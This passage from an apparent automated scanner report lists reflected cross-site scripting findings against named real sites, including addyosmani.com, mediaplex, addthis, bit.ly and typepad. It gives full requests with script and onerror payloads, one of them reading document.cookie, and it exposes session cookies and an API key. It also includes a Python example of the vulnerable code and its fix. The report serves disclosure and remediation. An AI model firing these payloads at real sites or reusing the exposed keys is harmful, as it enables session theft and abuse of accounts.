Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:43 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js/thickboxf0283\"><script>alert(1)</script>20365640c07/thickbox.js?ver=3.1-20100407"/>
...[SNIP]...

1.49. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ec63"><script>alert(1)</script>8f78decd4a6 was submitted in the REST URL parameter 5. This input was echoed as 3ec63\"><script>alert(1)</script>8f78decd4a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/thickbox/thickbox.js3ec63"><script>alert(1)</script>8f78decd4a6?ver=3.1-20100407 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.js3ec63\"><script>alert(1)</script>8f78decd4a6?ver=3.1-20100407"/>
...[SNIP]...

1.50. http://altfarm.mediaplex.com/ad/js/1551-47634-16084-8 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-47634-16084-8

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fab29'-alert(1)-'01f2172dd5f was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it must, note that here both mpt and mpvc are concatenated into a single-quoted JavaScript string literal that itself holds an HTML href attribute, so a value has to be safe for two parsers at once. Validate each value against its expected shape first (mpt is a numeric timestamp in the legitimate requests, mpvc an absolute http(s) URL that becomes the start of the href), then either encode for both enclosing contexts or pass the value to the page as an escaped JavaScript literal and build the anchor through DOM properties instead of document.write.

Request

GET /ad/js/1551-47634-16084-8?mpt=1297260344fab29'-alert(1)-'01f2172dd5f&mpvc=http://ib.adnxs.com/click/PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEtAQAAQUCAAIAAAAAHCRWxAAAAAA./cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA../referrer=http%3A%2F%2Ftechnorati.com%2Fcontact-us%2F/clickenc= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEtAQAAgUCAAIAAAAAHSRnxAAAAAA.&udj=uf%28%27a%27%2C+6788%2C+1297260344%29%3Buf%28%27g%27%2C+21129%2C+1297260344%29%3Buf%28%27r%27%2C+185513%2C+1297260344%29%3Bppv%289354%2C+%272423804119949281501%27%2C+1297260344%2C+1298469944%2C+48446%2C+27364%29%3B&cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA..&referrer=http://technorati.com/contact-us/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; mojo2=12109:6166

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 592
Date: Wed, 09 Feb 2011 14:08:33 GMT

document.write('<a target="_blank" href="http://ib.adnxs.com/click/PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEA
...[SNIP]...
KOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA../referrer=http://technorati.com/contact-us//clickenc=http://altfarm.mediaplex.com/ad/ck/1551-47634-16084-8?mpt=1297260344fab29'-alert(1)-'01f2172dd5f">
...[SNIP]...

1.51. http://altfarm.mediaplex.com/ad/js/1551-47634-16084-8 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-47634-16084-8

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84fc8'%3balert(1)//dd88c5f60fb was submitted in the mpvc parameter. This input was echoed as 84fc8';alert(1)//dd88c5f60fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-47634-16084-8?mpt=1297260344&mpvc=http://ib.adnxs.com/click/PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEtAQAAQUCAAIAAAAAHCRWxAAAAAA./cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA../referrer=http%3A%2F%2Ftechnorati.com%2Fcontact-us%2F/clickenc=84fc8'%3balert(1)//dd88c5f60fb HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEtAQAAgUCAAIAAAAAHSRnxAAAAAA.&udj=uf%28%27a%27%2C+6788%2C+1297260344%29%3Buf%28%27g%27%2C+21129%2C+1297260344%29%3Buf%28%27r%27%2C+185513%2C+1297260344%29%3Bppv%289354%2C+%272423804119949281501%27%2C+1297260344%2C+1298469944%2C+48446%2C+27364%29%3B&cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA..&referrer=http://technorati.com/contact-us/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; mojo2=12109:6166

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 592
Date: Wed, 09 Feb 2011 14:08:34 GMT

document.write('<a target="_blank" href="http://ib.adnxs.com/click/PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEA
...[SNIP]...
wB-gCoAecEtAQAAQUCAAIAAAAAHCRWxAAAAAA./cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA../referrer=http://technorati.com/contact-us//clickenc=84fc8';alert(1)//dd88c5f60fbhttp://altfarm.mediaplex.com/ad/ck/1551-47634-16084-8?mpt=1297260344">
...[SNIP]...

1.52. http://altfarm.mediaplex.com/ad/js/1551-47634-16084-8 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-47634-16084-8

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39878'%3balert(1)//4fc5e08aefa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39878';alert(1)//4fc5e08aefa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-47634-16084-8?mpt=1297260344&mpvc=http://ib.adnxs.com/click/PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEtAQAAQUCAAIAAAAAHCRWxAAAAAA./cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA../referrer=http%3A%2F%2Ftechnorati.com%2Fcontact-us%2F/clickenc=&39878'%3balert(1)//4fc5e08aefa=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEtAQAAgUCAAIAAAAAHSRnxAAAAAA.&udj=uf%28%27a%27%2C+6788%2C+1297260344%29%3Buf%28%27g%27%2C+21129%2C+1297260344%29%3Buf%28%27r%27%2C+185513%2C+1297260344%29%3Bppv%289354%2C+%272423804119949281501%27%2C+1297260344%2C+1298469944%2C+48446%2C+27364%29%3B&cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA..&referrer=http://technorati.com/contact-us/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; mojo2=12109:6166

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 595
Date: Wed, 09 Feb 2011 14:08:36 GMT

document.write('<a target="_blank" href="http://ib.adnxs.com/click/PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEA
...[SNIP]...
B-gCoAecEtAQAAQUCAAIAAAAAHCRWxAAAAAA./cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA../referrer=http://technorati.com/contact-us//clickenc=&39878';alert(1)//4fc5e08aefa=1http://altfarm.mediaplex.com/ad/ck/1551-47634-16084-8?mpt=1297260344">
...[SNIP]...
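
Findings 1.50 to 1.52 share one sink: the ad server concatenates request parameters into a single-quoted JavaScript string literal that itself carries an HTML href attribute, so any value has to survive two parsers. The Python example below is added here; it is not mediaplex code, and the legitimate parameter values are constructed (shortened) from the requests above. It reproduces the vulnerable string-building, then shows the two defences a fix needs: validating mpt as a timestamp and mpvc as an absolute http(s) URL (mpvc also forms the start of the href, so the scheme check matters), and handing the resulting URL to the page as an escaped JavaScript literal assigned through a DOM property rather than written as markup.

```python
import json
import re
from urllib.parse import urlsplit

# Constructed inputs: legitimate values modelled on the report's requests
# (mpvc shortened) and the two payload shapes the crawler used.
GOOD_MPT = '1297260344'
GOOD_MPVC = 'http://ib.adnxs.com/click/PDw8vLS09D8AAACg/clickenc='
BAD_MPT = "1297260344fab29'-alert(1)-'01f2172dd5f"
BAD_MPVC = "84fc8';alert(1)//dd88c5f60fb"

CLICK_URL = 'http://altfarm.mediaplex.com/ad/ck/1551-47634-16084-8'


def render_vulnerable(mpt: str, mpvc: str) -> str:
    """String-builds the document.write() call the way the observed response does.

    Both values land inside a single-quoted JavaScript string literal that is
    itself an HTML attribute value, and neither is encoded, so a single quote
    in either parameter terminates the literal and the rest runs as code.
    """
    return "document.write('<a target=\"_blank\" href=\"%s%s?mpt=%s\">');" % (mpvc, CLICK_URL, mpt)


def valid_mpt(value: str) -> bool:
    """mpt is a Unix timestamp in the legitimate requests; accept only that shape."""
    return re.fullmatch(r'[0-9]{1,10}', value) is not None


def valid_mpvc(value: str) -> bool:
    """mpvc becomes the start of an href, so it must be an absolute http(s) URL."""
    parts = urlsplit(value)
    return parts.scheme in ('http', 'https') and bool(parts.netloc)


def js_string_literal(value: str) -> str:
    """Encodes value as a JavaScript string literal that is inert to an HTML parser.

    json.dumps yields a double-quoted literal with backslash, quote and control
    characters (including U+2028/U+2029, via ensure_ascii) escaped. It leaves
    < > & ' alone, so those are turned into \\uXXXX escapes, which JavaScript
    decodes but an HTML tokenizer never sees as markup or quote characters.
    """
    encoded = json.dumps(value, ensure_ascii=True)
    for ch in "<>&'":
        encoded = encoded.replace(ch, '\\u%04x' % ord(ch))
    return encoded


def render_fixed(mpt: str, mpvc: str) -> str:
    """Validates both inputs, then hands the URL to the page as data, not markup.

    Raises ValueError for anything outside the expected shapes. The anchor is
    built through DOM properties, so there is no string concatenation for an
    attacker to break out of, and the scheme check keeps javascript: out of href.
    """
    if not (valid_mpt(mpt) and valid_mpvc(mpvc)):
        raise ValueError('rejected ad parameters')
    href = '%s%s?mpt=%s' % (mpvc, CLICK_URL, mpt)
    return ("(function(){var a=document.createElement('a');a.target='_blank';"
            "a.href=%s;document.body.appendChild(a);})();" % js_string_literal(href))


if __name__ == '__main__':
    print(render_vulnerable(BAD_MPT, GOOD_MPVC))
    print(render_fixed(GOOD_MPT, GOOD_MPVC))
    for mpt, mpvc in ((BAD_MPT, GOOD_MPVC), (GOOD_MPT, BAD_MPVC)):
        try:
            render_fixed(mpt, mpvc)
        except ValueError as exc:
            print('rejected:', exc, repr(mpt), repr(mpvc))
```

Validation does the real work here: an ad click URL has a known shape, and anything that does not match it should never reach an encoder at all. The encoder is the backstop for the characters that are legitimately allowed.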

1.53. http://api-public.addthis.com/url/shares.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied unmodified into the start of the response body, where it forms the name of the JSONP callback function. The payload f5701<script>alert(1)</script>5c382736caa was submitted in the callback parameter. This input was echoed unmodified in the application's response. Note that the response is served as application/javascript and carries no X-Content-Type-Options: nosniff header; the injected markup is rendered as HTML only by a browser that sniffs or disregards the declared type, so exploitability depends on the victim's browser as well as on the server. The underlying defect is that the callback name is not restricted to a JavaScript identifier.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fxhtml.co.il%2F%2Fru%2FjQuery%2F%25D0%259F%25D0%25BE%25D0%25B6%25D0%25B5%25D1%2580%25D1%2582%25D0%25B2%25D0%25BE%25D0%25B2%25D0%25B0%25D1%2582%25D1%258C-%25D0%25BD%25D0%25B0-%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B5%25D0%25BA%25D1%2582&callback=_ate.cbs.sc_httpxhtmlcoilrujQuery25D0259F25D025BE25D025B625D025B525D1258025D1258225D025B225D025BE25D025B225D025B025D1258225D1258C25D025BD25D025B025D025BF25D1258025D025BE25D025B525D025BA25D12582f5701<script>alert(1)</script>5c382736caa HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://xhtml.co.il/ru/jQuery/%D0%9F%D0%BE%D0%B6%D0%B5%D1%80%D1%82%D0%B2%D0%BE%D0%B2%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0-%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; uid=4d1ec56b7612a62c; psc=0; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297258169.60|1296659685.66

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Content-Type: application/javascript;charset=UTF-8
Date: Wed, 09 Feb 2011 13:30:20 GMT
Content-Length: 249
Connection: close

_ate.cbs.sc_httpxhtmlcoilrujQuery25D0259F25D025BE25D025B625D025B525D1258025D1258225D025B225D025BE25D025B225D025B025D1258225D1258C25D025BD25D025B025D025BF25D1258025D025BE25D025B525D025BA25D12582f5701<script>alert(1)</script>5c382736caa({"shares":0});

1.54. http://api.bit.ly/v3/clicks [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /v3/clicks

Issue detail

The value of the callback request parameter is copied unmodified into the start of the response body as the JSONP callback name. The payload ab034<script>alert(1)</script>77df4789a25 was submitted in the callback parameter. This input was echoed unmodified in the application's response. As with 1.53, the response is served as application/javascript without an X-Content-Type-Options: nosniff header, so the markup only renders where a browser sniffs or ignores the declared content type; the missing control is a whitelist on the callback name.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v3/clicks?callback=BitlyCB._cb_._1ab034<script>alert(1)</script>77df4789a25&hash=gieIvT&login=retweetjs&apiKey=R_6287c92ecaf9efc6f39e4f33bdbf80b1&client=bitly-javascript-api HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:56 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 228
Etag: "6eaaf4608cfb2c1b81417046fb23c1b41c06a86e"

BitlyCB._cb_._1ab034<script>alert(1)</script>77df4789a25({"status_code": 200, "data": {"clicks": [{"user_clicks": 7, "global_hash": "gteAat", "hash": "gieIvT", "user_hash": "gieIvT", "global_clicks": 350}]}, "status_txt": "OK"})

1.55. http://api.bit.ly/v3/clicks [hash parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /v3/clicks

Issue detail

The value of the hash request parameter is copied into the HTML document as plain text between tags. The payload da6f7<script>alert(1)</script>bd4549a5895 was submitted in the hash parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v3/clicks?callback=BitlyCB._cb_._1&hash=gieIvTda6f7<script>alert(1)</script>bd4549a5895&login=retweetjs&apiKey=R_6287c92ecaf9efc6f39e4f33bdbf80b1&client=bitly-javascript-api HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:58 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 162
Etag: "92132319e161a08b07ec905a27afdd89d4efe6c5"

BitlyCB._cb_._1({"status_code": 200, "data": {"clicks": [{"hash": "gieIvTda6f7<script>alert(1)</script>bd4549a5895", "error": "NOT_FOUND"}]}, "status_txt": "OK"})

1.56. http://api.bit.ly/v3/shorten [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /v3/shorten

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e31ab<script>alert(1)</script>d5370509003 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v3/shorten?callback=BitlyCB._cb_._0e31ab<script>alert(1)</script>d5370509003&longUrl=http%3A%2F%2Faddyosmani.com%2Fblog%2Fvideo-jquerysub-explained%2F&login=retweetjs&apiKey=R_6287c92ecaf9efc6f39e4f33bdbf80b1&client=bitly-javascript-api HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:56 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
MIME-Version: 1.0
Content-Length: 279

BitlyCB._cb_._0e31ab<script>alert(1)</script>d5370509003({ "status_code": 200, "status_txt": "OK", "data": { "long_url": "http:\/\/addyosmani.com\/blog\/video-jquerysub-explained\/", "url": "http:\/\/bit.ly\/gieIvT", "hash": "gieIvT", "global_hash": "gteAat
...[SNIP]...

1.57. http://api.bit.ly/v3/shorten [longUrl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /v3/shorten

Issue detail

The value of the longUrl request parameter is copied into the HTML document as plain text between tags. The payload 526ba<img%20src%3da%20onerror%3dalert(1)>1d168719f2c was submitted in the longUrl parameter. This input was echoed as 526ba<img src=a onerror=alert(1)>1d168719f2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /v3/shorten?callback=BitlyCB._cb_._0&longUrl=http%3A%2F%2Faddyosmani.com%2Fblog%2Fvideo-jquerysub-explained%2F526ba<img%20src%3da%20onerror%3dalert(1)>1d168719f2c&login=retweetjs&apiKey=R_6287c92ecaf9efc6f39e4f33bdbf80b1&client=bitly-javascript-api HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:32:07 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
MIME-Version: 1.0
Content-Length: 282

BitlyCB._cb_._0({ "status_code": 200, "status_txt": "OK", "data": { "long_url": "http:\/\/addyosmani.com\/blog\/video-jquerysub-explained\/526ba<img src=a onerror=alert(1)>1d168719f2c", "url": "http:\/\/bit.ly\/eJxttl", "hash": "eJxttl", "global_hash": "hT5aoW", "new_hash": 1 } })

1.58. http://api.typepad.com/blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.typepad.com
Path:   /blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 10983<script>alert(1)</script>a859f55dcf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js?callback=jsonp1297262343116&max-results=3&10983<script>alert(1)</script>a859f55dcf4=1 HTTP/1.1
Host: api.typepad.com
Proxy-Connection: keep-alive
Referer: http://www.typepad.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=151985724.1297262343.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151985724.379581336.1297262343.1297262343.1297262343.1; __utmc=151985724; __utmb=151985724.1.10.1297262343

Response

HTTP/1.0 400 Bad Request
Date: Wed, 09 Feb 2011 14:38:58 GMT
Server: Apache
